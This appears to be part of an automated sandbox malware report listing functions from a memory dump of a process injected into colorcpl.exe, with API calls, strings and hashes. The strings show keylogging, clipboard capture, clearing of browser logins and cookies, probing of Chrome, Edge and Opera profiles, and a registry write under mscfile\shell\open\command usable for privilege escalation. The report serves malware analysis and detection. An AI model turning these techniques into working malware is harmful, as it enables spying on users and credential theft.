                                                              • RegOpenKeyExW.ADVAPI32(80000000,http\shell\open\command,00000000,00020019,00000000,03102248,03101FFC), ref: 030A2030
                                                              • RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,?,00000400), ref: 030A204B
                                                              • RegCloseKey.ADVAPI32(00000000), ref: 030A2054
                                                              Strings
                                                              • http\shell\open\command, xrefs: 030A2026
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CloseOpenQueryValue
                                                              • String ID: http\shell\open\command
                                                              • API String ID: 3677997916-1487954565
                                                              • Opcode ID: da709fd8f0b4de56aa7ca6130138bfefb90ee73870f215b42182154731b609ce
                                                              • Instruction ID: e0b555229c9dd95b1965c3fc2b9bde28fd2cfee5a72b2b2eaf9a555561f79d93
                                                              • Opcode Fuzzy Hash: da709fd8f0b4de56aa7ca6130138bfefb90ee73870f215b42182154731b609ce
                                                              • Instruction Fuzzy Hash: D9F0967160121CFFDBA0EA96EC49EDFBBBCEB94B01F0040A6B615E6100DF715A59D7A0
                                                              Function 030A2204 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39registryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • RegCreateKeyW.ADVAPI32(80000001,Software\Classes\mscfile\shell\open\command,?), ref: 030A220F
                                                              • RegSetValueExW.ADVAPI32(?,030F9654,00000000,?,00000000,00000000,030F9654,?,0309674F,030F9654,C:\Windows\SysWOW64\colorcpl.exe), ref: 030A223E
                                                              • RegCloseKey.ADVAPI32(?,?,0309674F,030F9654,C:\Windows\SysWOW64\colorcpl.exe), ref: 030A2249
                                                              Strings
                                                              • Software\Classes\mscfile\shell\open\command, xrefs: 030A220D
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CloseCreateValue
                                                              • String ID: Software\Classes\mscfile\shell\open\command
                                                              • API String ID: 1818849710-505396733
                                                              • Opcode ID: 8dfdf09a5ce2c71b8b33d950340ea02e62e8e7bae2fe9651121ae761fbf3abd3
                                                              • Instruction ID: 9f743c03b8a3c20576e87079281c6aebc0e6a8d34af3e36b2495ee845795e892
                                                              • Opcode Fuzzy Hash: 8dfdf09a5ce2c71b8b33d950340ea02e62e8e7bae2fe9651121ae761fbf3abd3
                                                              • Instruction Fuzzy Hash: 85F04F7154211CFBDF00EFA0FD05EEE376CEF44651F008556B9059A110EB3AAE14DB90
                                                              Function 0309C9CE Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 0309C9D9
                                                              • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0309CA18
                                                                • Part of subcall function 030C33ED: _Yarn.LIBCPMT ref: 030C340C
                                                                • Part of subcall function 030C33ED: _Yarn.LIBCPMT ref: 030C3430
                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 0309CA3E
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
                                                              • String ID: bad locale name
                                                              • API String ID: 3628047217-1405518554
                                                              • Opcode ID: 91622e0f4ca4289387fb0d4c3c68d133065eac29cfbf40a8018063f7152d7a6d
                                                              • Instruction ID: e560239653e873a6a2286976939df359f00d5042cde83c743e5c4ec6e91366a0
                                                              • Opcode Fuzzy Hash: 91622e0f4ca4289387fb0d4c3c68d133065eac29cfbf40a8018063f7152d7a6d
                                                              • Instruction Fuzzy Hash: C5F0C83E412704EFEB24FB60D851DDEB7A89F54210F54892EE5560A4D0FF31AE08D790
                                                              Function 030CFD01 Relevance: 6.1, APIs: 4, Instructions: 133COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: aa860ef357c15fa9fe0d57a6c7e2aa50abf3e930524f8439b56f7be688c447fd
                                                              • Instruction ID: a45fd4821cddefc433530fcbe0c6b2aab410e49d0e59ddb3a25293e9c966a82a
                                                              • Opcode Fuzzy Hash: aa860ef357c15fa9fe0d57a6c7e2aa50abf3e930524f8439b56f7be688c447fd
                                                              • Instruction Fuzzy Hash: A6412676A11789AFD724DF78CC40BAEBBEAEB88710F10462EE151DF290D77199018791
                                                              Function 0309AF4D Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 103sleepCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              • Cleared browsers logins and cookies., xrefs: 0309B036
                                                              • [Cleared browsers logins and cookies.], xrefs: 0309B025
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Sleep
                                                              • String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
                                                              • API String ID: 3472027048-1236744412
                                                              • Opcode ID: bf985e00013ee3b65497e37158703a28b76144be7f9b1f32fe8bda315571c04b
                                                              • Instruction ID: d22a383280e527e8a800964320fcc9722271e2c3fe0f7eb25cbffb357a17456d
                                                              • Opcode Fuzzy Hash: bf985e00013ee3b65497e37158703a28b76144be7f9b1f32fe8bda315571c04b
                                                              • Instruction Fuzzy Hash: 8931AA4874F3846EFE51FBF864357EABBC64ED3950F0C488AA8D40F683DA564409A363
                                                              Function 030994FF Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 81sleepCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 030AA2DB: GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 030AA2EB
                                                                • Part of subcall function 030AA2DB: GetWindowTextLengthW.USER32(00000000), ref: 030AA2F4
                                                                • Part of subcall function 030AA2DB: GetWindowTextW.USER32(00000000,00000000,00000001), ref: 030AA31E
                                                              • Sleep.KERNEL32(000001F4), ref: 0309955A
                                                              • Sleep.KERNEL32(00000064), ref: 030995F5
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Window$SleepText$ForegroundLength
                                                              • String ID: [ $ ]
                                                              • API String ID: 3309952895-93608704
                                                              • Opcode ID: bb6b1b2f07c9000845953c6a9fda8f60464be19d1091fd24ef447fd437f89338
                                                              • Instruction ID: c3b3770dcd355fbf520488b81ab8b35cf02464b769fe2be8534aada3f23b91eb
                                                              • Opcode Fuzzy Hash: bb6b1b2f07c9000845953c6a9fda8f60464be19d1091fd24ef447fd437f89338
                                                              • Instruction Fuzzy Hash: 6D21B639B063046BED18F775DC26AEE33A8AFD1310F40081EE5525F1D1EF659A09A392
                                                              Function 030D0F33 Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 24faa6d0380812fde2577e64d5dbf29d1fa8af47458eaa6b3d3261f09462b590
                                                              • Instruction ID: a7dff3c6035053b4d1af5478d480aae8baa90bdf7db25672a0fae37fb69fe54d
                                                              • Opcode Fuzzy Hash: 24faa6d0380812fde2577e64d5dbf29d1fa8af47458eaa6b3d3261f09462b590
                                                              • Instruction Fuzzy Hash: 1301DFB270B71A3EE660A9787CC0FAB66CCCB817B4F350769F529591C4DA25CC004560
                                                              Function 030D0FB2 Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d3d9eb84bbaabd18f5415a50de6b718408aec6156ba01ea1177135983529daa6
                                                              • Instruction ID: d686cf715647943451d2392a34784ff62373b64208bdd45ba96ce1d9a0390cec
                                                              • Opcode Fuzzy Hash: d3d9eb84bbaabd18f5415a50de6b718408aec6156ba01ea1177135983529daa6
                                                              • Instruction Fuzzy Hash: A10126B220B71A3EA6A0B9797CC8E6B6BCCDF853B83350325F121991C5EF788C404120
                                                              Function 030D5A95 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,030D5A3C,00000000,00000000,00000000,00000000,?,030D5D68,00000006,FlsSetValue), ref: 030D5AC7
                                                              • GetLastError.KERNEL32(?,030D5A3C,00000000,00000000,00000000,00000000,?,030D5D68,00000006,FlsSetValue,030EC110,030EC118,00000000,00000364,?,030D57F7), ref: 030D5AD3
                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,030D5A3C,00000000,00000000,00000000,00000000,?,030D5D68,00000006,FlsSetValue,030EC110,030EC118,00000000), ref: 030D5AE1
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: LibraryLoad$ErrorLast
                                                              • String ID:
                                                              • API String ID: 3177248105-0
                                                              • Opcode ID: a5ba2626f2435a0d631cbdd24873f1897fd49017c9ad29dd689bb3de6860d09b
                                                              • Instruction ID: 641414adfaf39c3dc2d0a7e5f12726feeaec89ecf089dbf21a27367c2982069c
                                                              • Opcode Fuzzy Hash: a5ba2626f2435a0d631cbdd24873f1897fd49017c9ad29dd689bb3de6860d09b
                                                              • Instruction Fuzzy Hash: FB01D4363033379BC761D96CAC8495B7BE8AF46A717190A20FD16D7180D725D400C6E0
                                                              Function 030AA20F Relevance: 6.0, APIs: 4, Instructions: 50fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,00000000,00000000,030A5A44), ref: 030AA228
                                                              • GetFileSize.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,030A5A44), ref: 030AA23C
                                                              • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,030A5A44), ref: 030AA261
                                                              • CloseHandle.KERNEL32(00000000,00000000,00000000,030A5A44), ref: 030AA26F
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: File$CloseCreateHandleReadSize
                                                              • String ID:
                                                              • API String ID: 3919263394-0
                                                              • Opcode ID: 9fb6cba49eea609fb63c81cedcc8b9131ee9d386b5760f7b5d21699d97e801cc
                                                              • Instruction ID: 9ed36a8b6a4462a44a368665226dd8f8d6ff7beb78423b2f88ac6b998570d1f3
                                                              • Opcode Fuzzy Hash: 9fb6cba49eea609fb63c81cedcc8b9131ee9d386b5760f7b5d21699d97e801cc
                                                              • Instruction Fuzzy Hash: 61F0C87534360C7FF6106A28BC94EBF379CD786964F00062DF901961C0C62B4C155230
                                                              Function 030C7603 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • ___BuildCatchObject.LIBVCRUNTIME ref: 030C761A
                                                                • Part of subcall function 030C7C52: ___AdjustPointer.LIBCMT ref: 030C7C9C
                                                              • _UnwindNestedFrames.LIBCMT ref: 030C7631
                                                              • ___FrameUnwindToState.LIBVCRUNTIME ref: 030C7643
                                                              • CallCatchBlock.LIBVCRUNTIME ref: 030C7667
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                                                              • String ID:
                                                              • API String ID: 2633735394-0
                                                              • Opcode ID: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                                                              • Instruction ID: 8824733de5819347f3a1da6bc799e74dee64817ea9db8e8ac4ae9c8048daea06
                                                              • Opcode Fuzzy Hash: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                                                              • Instruction Fuzzy Hash: DA011736011289BFCF529F69CC40EDE7BBAEF88B54F058018F91865120C336E861EFA4
                                                              Function 030A739D Relevance: 6.0, APIs: 4, Instructions: 43COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetSystemMetrics.USER32(0000004C), ref: 030A73AA
                                                              • GetSystemMetrics.USER32(0000004D), ref: 030A73B0
                                                              • GetSystemMetrics.USER32(0000004E), ref: 030A73B6
                                                              • GetSystemMetrics.USER32(0000004F), ref: 030A73BC
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: MetricsSystem
                                                              • String ID:
                                                              • API String ID: 4116985748-0
                                                              • Opcode ID: ef81bb85cbb1d2d31dd2b96fe8df3e74f461139ab0ad5d7a805023f4a171fef0
                                                              • Instruction ID: bb6ad69959738e4d151a4eba42f92429109dd17c4689cfd7a53b1489d5a76fd0
                                                              • Opcode Fuzzy Hash: ef81bb85cbb1d2d31dd2b96fe8df3e74f461139ab0ad5d7a805023f4a171fef0
                                                              • Instruction Fuzzy Hash: E2F0A4A2B017154FD740EAF9A840A2F6AD99BD4560F10442EE6458B281EFB9DC058790
                                                              Function 030D015D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __startOneArgErrorHandling.LIBCMT ref: 030D01ED
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ErrorHandling__start
                                                              • String ID: pow
                                                              • API String ID: 3213639722-2276729525
                                                              • Opcode ID: 5af013d2910ae7cb1dd20d718bdc5b5791bf7e77b29d1d708ff0c91cde6f840c
                                                              • Instruction ID: 0ce8df328fd9b5c41926189d6ae201b3901343d926257a82b76957ce783a7477
                                                              • Opcode Fuzzy Hash: 5af013d2910ae7cb1dd20d718bdc5b5791bf7e77b29d1d708ff0c91cde6f840c
                                                              • Instruction Fuzzy Hash: CA519365B0730296DB51F71CCA003BE7BD4DB40B50F2C4E58E4DA4A2DDEB398895CA46
                                                              Function 0309A694 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 030C2525: __onexit.LIBCMT ref: 030C252B
                                                              • __Init_thread_footer.LIBCMT ref: 0309A6E3
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Init_thread_footer__onexit
                                                              • String ID: [End of clipboard]$[Text copied to clipboard]
                                                              • API String ID: 1881088180-3686566968
                                                              • Opcode ID: 1265d97c3cf5668b055c2efdf8b9b0b3d4b46af0236cb2f16301a5f7fa4f8811
                                                              • Instruction ID: cec83dadfd467af8c31a7fbcb51849e26ffcdb58301bea033795689e00b1a8cc
                                                              • Opcode Fuzzy Hash: 1265d97c3cf5668b055c2efdf8b9b0b3d4b46af0236cb2f16301a5f7fa4f8811
                                                              • Instruction Fuzzy Hash: 5421B639B123095FEF08FBA4DCA1DEEB379AFD4210F50056AD5165F191DF309A4AD640
                                                              Function 030DED17 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,030DEF72,?,00000050,?,?,?,?,?), ref: 030DEDF2
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID: ACP$OCP
                                                              • API String ID: 0-711371036
                                                              • Opcode ID: 38bb0f5b298e4f52d0befe1d306622e090414746b18dc63367b0407f09f9dc03
                                                              • Instruction ID: 7070218d1ea71d7f1f8a797d30f2ae3589a38f517a315d32885af5348b001cd4
                                                              • Opcode Fuzzy Hash: 38bb0f5b298e4f52d0befe1d306622e090414746b18dc63367b0407f09f9dc03
                                                              • Instruction Fuzzy Hash: F721F866A02304A6E774DB54CD00BABB3EAEF44E50F5A4464ED0ADF10CEF32D900C360
                                                              Function 03094FD4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67timeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetLocalTime.KERNEL32(?,031024A8,?,00000000,?,?,?,?,?,?,030A46C2,?,00000001,0000004C,00000000), ref: 03095010
                                                                • Part of subcall function 030A94DA: GetLocalTime.KERNEL32(00000000), ref: 030A94F4
                                                              • GetLocalTime.KERNEL32(?,031024A8,?,00000000,?,?,?,?,?,?,030A46C2,?,00000001,0000004C,00000000), ref: 03095067
                                                              Strings
                                                              • Connection KeepAlive | Enabled | Timeout: , xrefs: 03094FFF
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: LocalTime
                                                              • String ID: Connection KeepAlive | Enabled | Timeout:
                                                              • API String ID: 481472006-507513762
                                                              • Opcode ID: 8191d0b250c8c1b1bce73bbcef5db22d0388b03bc89d93479aa69a95a795c798
                                                              • Instruction ID: e3a2c44b7a9486154350f6e33f23990b5a1e6a01b41773739be9dfe91a0d9028
                                                              • Opcode Fuzzy Hash: 8191d0b250c8c1b1bce73bbcef5db22d0388b03bc89d93479aa69a95a795c798
                                                              • Instruction Fuzzy Hash: 64214925A023445BEB0AF765DC2C7AAB798A7CB208F040D1EE8400B185DB755649C7E7
                                                              Function 030A94DA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 59timeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetLocalTime.KERNEL32(00000000), ref: 030A94F4
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: LocalTime
                                                              • String ID: | $%02i:%02i:%02i:%03i
                                                              • API String ID: 481472006-2430845779
                                                              • Opcode ID: aee3d4a8a7b3c16c0254e5273664deca97f7103c9891edbff7fed0db5aa96ba7
                                                              • Instruction ID: bd1511a7543ea6a530f1897b72d856ac31ece810dcaba97aa4537f9ae3367ffd
                                                              • Opcode Fuzzy Hash: aee3d4a8a7b3c16c0254e5273664deca97f7103c9891edbff7fed0db5aa96ba7
                                                              • Instruction Fuzzy Hash: B31196352093095ADB08FBA4D8508EFF3E8AFD4200F500A1FF4958A1D1EF38D945D751
                                                              Function 03099F9A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 0309A0B0: GetLocalTime.KERNEL32(?,?,00000000), ref: 0309A0BE
                                                                • Part of subcall function 0309A0B0: wsprintfW.USER32 ref: 0309A13F
                                                                • Part of subcall function 030A94DA: GetLocalTime.KERNEL32(00000000), ref: 030A94F4
                                                              • CloseHandle.KERNEL32(?), ref: 03099FFD
                                                              • UnhookWindowsHookEx.USER32 ref: 0309A010
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
                                                              • String ID: Online Keylogger Stopped
                                                              • API String ID: 1623830855-1496645233
                                                              • Opcode ID: 214f03ff3f2f3eeee418dfe653e90a5332711ebb5938cac0c0d2edb77d0b4283
                                                              • Instruction ID: 0ccfb860eed837cbc7d4a911b7949a9e3f4066c375efffb8ec464e62b51910ce
                                                              • Opcode Fuzzy Hash: 214f03ff3f2f3eeee418dfe653e90a5332711ebb5938cac0c0d2edb77d0b4283
                                                              • Instruction Fuzzy Hash: 8C01F538B063085BFF25FB68D8067FD7BB98BC2310F44094FC5410A542DBA62556E7D6
                                                              Function 0309B404 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Google\Chrome\,00000000,?,?,?,?,?,?,0309B53E,?), ref: 0309B437
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ExistsFilePath
                                                              • String ID: UserProfile$\AppData\Local\Google\Chrome\
                                                              • API String ID: 1174141254-4188645398
                                                              • Opcode ID: efd12b897d0a38b02dd8a097c5e2f4ebd1cf92bd978ed895f4dc3dac38740d97
                                                              • Instruction ID: d2dc2a29d3e52101f5ef3cece928628ff882993dc7e6aa84ba81b75dab6fdfc4
                                                              • Opcode Fuzzy Hash: efd12b897d0a38b02dd8a097c5e2f4ebd1cf92bd978ed895f4dc3dac38740d97
                                                              • Instruction Fuzzy Hash: ADF0A738A4331A9FDF08FBF5DC07DFFBB6C9DA0520B000057B615AE591DE919845A6D1
                                                              Function 0309B467 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Microsoft\Edge\,00000000,?,?,?,?,?,?,0309B5A1,?), ref: 0309B49A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ExistsFilePath
                                                              • String ID: UserProfile$\AppData\Local\Microsoft\Edge\
                                                              • API String ID: 1174141254-2800177040
                                                              • Opcode ID: d1cbc2a035f8ae3e04ffd8ecd4395827c82324701fd98037bbfe7d8168b45f4c
                                                              • Instruction ID: 5c2eae8ef6f9c943179c9b4ede99ede430afee77fc1f5b768e6a300022579ed4
                                                              • Opcode Fuzzy Hash: d1cbc2a035f8ae3e04ffd8ecd4395827c82324701fd98037bbfe7d8168b45f4c
                                                              • Instruction Fuzzy Hash: BBF08238A0331A9EDF04F7F5DC16DFF7B689990510B000457A6159A181DE559846A6D1
                                                              Function 0309B4CA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • PathFileExistsW.SHLWAPI(00000000,\Opera Software\Opera Stable\,00000000,?,?,?,?,?,?,0309B604,?), ref: 0309B4FD
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ExistsFilePath
                                                              • String ID: AppData$\Opera Software\Opera Stable\
                                                              • API String ID: 1174141254-1629609700
                                                              • Opcode ID: bdf59d1949102c499a310002227132cf39450befd38938d1d441699efac367a4
                                                              • Instruction ID: c9fc589327a4acd681c1eb3d4bd2035dc6b8dfda037fd0e6473b239edfe35caa
                                                              • Opcode Fuzzy Hash: bdf59d1949102c499a310002227132cf39450befd38938d1d441699efac367a4
                                                              • Instruction Fuzzy Hash: 62F08238A073195FDE04FBF5D806AFF7B6C9990A10B00005BE611AA181DE519946A6E0
                                                              Function 0309A592 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 32keyboardCOMMON
                                                              Download Yara Rule
